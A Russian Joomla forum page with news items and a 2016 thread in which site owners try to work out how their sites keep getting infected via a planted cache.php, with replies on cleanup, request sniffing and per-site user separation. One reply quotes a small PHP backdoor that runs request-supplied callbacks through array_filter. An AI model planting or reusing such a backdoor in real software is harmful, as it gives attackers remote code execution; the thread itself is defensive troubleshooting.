Новости Joomla

👩‍💻 SW JProjects v.2.6.1 - компонент каталога расширений для веб-приложений.

👩‍💻 SW JProjects v.2.6.1 - компонент каталога расширений для веб-приложений.

Компонент позволяет сделать свой мини-Joomla Extensions Directory - каталог расширений для CMS (не только для Joomla) или файлов. Есть возможность скачивания по лицензионным ключам создания кастомных схем данных для сервера обновлений.

👩‍💻 v.2.6.1. Что нового?
- Правки наследования схем серверов обновлений. Улучшена логика наследования схем серверов обновлений для проектов компонент - категория - проект.
- Не стабильные релизы в сервере обновлений. Теперь в данные сервера обновлений попадают все версии (alpha, beta и т.д.), а не только stable.
- Косметические изменения. В шаблоне по умолчанию сделаны замены некоторых CSS-классов, уточнено присвоение атрибутов loading=lazy и fetchpriority.
- Рефакторинг и правки кода. Текущее обновление кодовой базы.
- Исправление ошибок.

👩‍💻 Больше спасибо за помощь в тестировании участникам нашего сообщества Александру Новикову (@pro_portal) и Александру Судьбинову (@alexrevo).

- Страница расширения
- GitHub расширения
- Joomla Extensions Directory

@joomlafeed

Событие Pizza, Bugs & Fun - 29-30 января 2026 года.

Событие Pizza, Bugs & Fun - 29-30 января 2026 года.

Уже несколько лет в мире Joomla проводятся мероприятия "Pizza, Bugs & Fun" (#PBF), где каждый может посвятить несколько часов своего мозгового времени тому, чтобы наша любимая CMS стала ближе к идеалу.

Ссылки на видео и статьи из этого поста рассказывает об организационных вопросах, которые пригодятся для участия в PBF, а так же что и как делать.

В рамках события PBF все желающие могут собираться в общий онлайн чат, обсудить вопросы Joomla и приложить к их разрешению свою руку. Самый классный вариант, когда эта встреча происходит оффлайн: тогда организовывается пицца, напитки по вкусу и несколько часов совместного творчества.

Каждый помогает тем, что он умеет:

  • кто-то пишет недостающую документацию,
  • кто-то пишет код,
  • кто-то тестирует как исправлены ошибки или сделан новый функционал.

На сайте события есть карта, можно "захостить" свою локацию. Практически все движки в мире развиваются за счёт спонсирующих их компаний. Joomla одна из немногих, где развитие идёт только усилиями международного сообщества энтузиастов.

https://www.youtube.com/watch?v=a-FuVKXg_Uw 

На момент написания данного поста в репозитории Joomla 810 открытых Issue (как правило это баги) и 236 Pull request (PR, исправление багов и новый функционал). Все PR обязательно тестируются минимум двумя участниками сообщества, дабы в конечный код движка не проскочила ошибка.

Если каждый из участников только нашего сообщества сделает даже одно тестирование, то, боюсь, PR и Issue на всех не хватит 😀 И ничего не останется нашим коллегам из международных Joomla-чатов.

Вышла Kunena 7.0 — стабильный релиз для Joomla! 5.4 и 6.0.

👩‍💻 Вышла Kunena 7.0 — стабильный релиз для Joomla! 5.4 и 6.0.

Команда Kunena объявила о выпуске Kunena 7.0 (stable) — нового стабильного релиза форума как нативного расширения для Joomla! 5.4 и Joomla! 6.0. Релиз опубликован 25 января 2026 года. Версия Kunena 7.0 работает в Joomla! 6.0 нативно, без необходимости использования плагинов совместимости.

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 4073 Просмотров
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Как понять в чем уязвимость сайта?
« : 08.06.2016, 18:23:28 »
Добрый день!
Ищу решение.
Идут регулярные взломы сайта.

Сайт обновляется вовремя.
Пароли сложные, после каждого взлома меняются.
Компьютер с которого работает FTP-клиент проверен на вирусы.
Да и поддержка сказала, что взлом НЕ через FTP или shel.
Все папки имеют права 755, файлы 644.
На сервере сайт не единственный, но взлом происходит через этот, насколько могу судить.

На сайте появляется скрипт cache.php.
Спойлер
[свернуть]

Через него происходит заражение других php файлов.
По времени заражения нашел в логе 4 строчки.
Спойлер
[свернуть]

Кто-то может подсказать в чем уязвимость?
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Как понять в чем уязвимость сайта?
« Ответ #1 : 08.06.2016, 18:48:54 »
Я бы не был так уверен, что взлом именно через Joomla .
Что мешает завести отдельный аккаунт для Joomla и тогда уже как бы карантин точно
Из расширений защиты что установлено ? RSFirewall установите
Записан
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #2 : 08.06.2016, 19:12:36 »
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #3 : 08.06.2016, 19:26:02 »
Цитата: mak200 от 08.06.2016, 19:12:36
Никаких расширений безопасности не установлено.
Второй сайт на аккаунте тоже Joomla.

Есть мысли по поводу строк из лог-файла?
Сначала почистите сайт, наведите профилактические меры безопасности и поставте снифер для отловли не GET запросов, там все и прояснится, взломщик полюбому будет пытаться востановить доступ, вот там и выявите уязвимый участок кода.
Записан
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #4 : 08.06.2016, 19:37:29 »
Цитата: winstrool от 08.06.2016, 19:26:02
Сначала почистите сайт,

Это сделал.

Цитата: winstrool от 08.06.2016, 19:26:02
наведите профилактические меры безопасности

Что имеется в виду?
Мне кажется, что уже все сделал что знал.

Цитата: winstrool от 08.06.2016, 19:26:02
и поставте снифер для отловли не GET запросов

Это что такое, расширение какое-то? Первый раз слышу.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #5 : 08.06.2016, 21:14:16 »
Цитата: mak200 от 08.06.2016, 19:37:29
Это что такое, расширение какое-то? Первый раз слышу.
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Записан
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Как понять в чем уязвимость сайта?
« Ответ #6 : 08.06.2016, 21:23:22 »
А где ж версии и что стоит?
Записан
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Re: Как понять в чем уязвимость сайта?
« Ответ #7 : 08.06.2016, 21:29:04 »
Цитата: winstrool от 08.06.2016, 21:14:16
Это такой самописный скрипт, который прогружается поверх всех скриптов и ведет свой лог, как общий пример для ознакомления https://forum.antichat.ru/threads/404932/
Круто!
Записан
*

Филипп Сорокин

  • Завсегдатай
  • 1918
  • 160 / 4
  • разработчик.москва
Re: Как понять в чем уязвимость сайта?
« Ответ #8 : 08.06.2016, 21:31:56 »
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Записан
*

wishlight

  • Гуру
  • 5076
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Как понять в чем уязвимость сайта?
« Ответ #9 : 08.06.2016, 21:58:03 »
Версия Joomla какая? Когда была обновлена?
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #10 : 08.06.2016, 22:49:24 »
Цитата: Филипп Сорокин от 08.06.2016, 21:31:56
Надо добавить, что сам по себе сниффер бесполезен. А вот если к его логам fail2ban подключить, то это будет очень мощная штука - попытался сделать инъекцию - получил бан!
Не всегда баном можно защетиться, а вот найти багу и закрыть ее, вот это дело!
Записан
*

mak200

  • Захожу иногда
  • 107
  • 0 / 2
Re: Как понять в чем уязвимость сайта?
« Ответ #11 : 09.06.2016, 00:10:34 »
Joomla!, 3.5.1.
Обновлял до взлома, точно не помню.

Завтра думаю воспроизвести локально свою кмс, со всеми расширениями.
И затем сравнить с сервером на различия файлов.
Записан
*

finkel

  • Новичок
  • 2
  • 0 / 0
Re: Как понять в чем уязвимость сайта?
« Ответ #12 : 28.06.2016, 00:19:12 »
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

Цитировать
IF ($_REQUEST['param1'] && $_REQUEST['param2']) { $f = $_REQUEST['param1']; $p = array( $_REQUEST['param2'); $fp = array_filter($p, $f); echo 'OK'; exit;}

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Как понять в чем уязвимость сайта?
« Ответ #13 : 28.06.2016, 11:57:21 »
Цитата: finkel от 28.06.2016, 00:19:12
Как успехи? у меня тоже самое на джумлосайте, я обнаружил еще обработку get параметров

сache.php заливают через это, $f - callback, $p - параметр, но как это попало на сайт, я понять не могу.
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...
Записан
*

finkel

  • Новичок
  • 2
  • 0 / 0
Re: Как понять в чем уязвимость сайта?
« Ответ #14 : 28.06.2016, 16:48:48 »
Цитата: winstrool от 28.06.2016, 11:57:21
Поподает по средствам взлома, ищите, лечите, устраняйте проблему...

P.S: Тоже интересно, чем дело закончилось у ТС...

Обновили сайтики и выпилили все бекдоры, ждем.
Самое интересное это как через один сайт все заразили.
Записан
*

wishlight

  • Гуру
  • 5076
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Как понять в чем уязвимость сайта?
« Ответ #15 : 28.06.2016, 17:19:58 »
Ну вы их хоть разделили? Чтобы опять такого не было.
Записан
*

Ragivort

  • Завсегдатай
  • 1156
  • 58 / 2
  • Такая Life
Re: Как понять в чем уязвимость сайта?
« Ответ #16 : 05.07.2016, 12:41:49 »
 
Цитата: wishlight от 28.06.2016, 17:19:58
Ну вы их хоть разделили? Чтобы опять такого не было.
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Записан
Дозволь мне свершить то добро, которое я способен свершить, теперь, ибо я могу более не вернуться сюда.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Как понять в чем уязвимость сайта?
« Ответ #17 : 05.07.2016, 14:46:09 »
Цитата: Ragivort от 05.07.2016, 12:41:49
Оффтоп мб, но что имеется в виду? Если у меня на VPS много сайтов, их как-то можно разделить? По юзерам? Чтобы они не были в одной папке
Создать отдельного пользователя для каждого сайта, один сайт один пользователь с бд, ftp и прочими доступами. Это самое простое разделение. кол-по пользователей = кол-ву сайтов ну и root (root-а использовать только для настроек vps) и работы вести с каждым сайтом только от имени его пользователя.
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3348 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

 Ответов: 678
Просмотров: 270432 		Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

 Ответов: 7
Просмотров: 2856 		Последний ответ 05.10.2021, 21:39:26
от ShopES
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

 Ответов: 11
Просмотров: 2528 		Последний ответ 03.11.2020, 17:36:03
от Cedars
Мониторинг файлов CMS и сайта - предлагаю решение

Автор GRIG

 Ответов: 18
Просмотров: 5151 		Последний ответ 28.08.2020, 22:00:30
от cntrl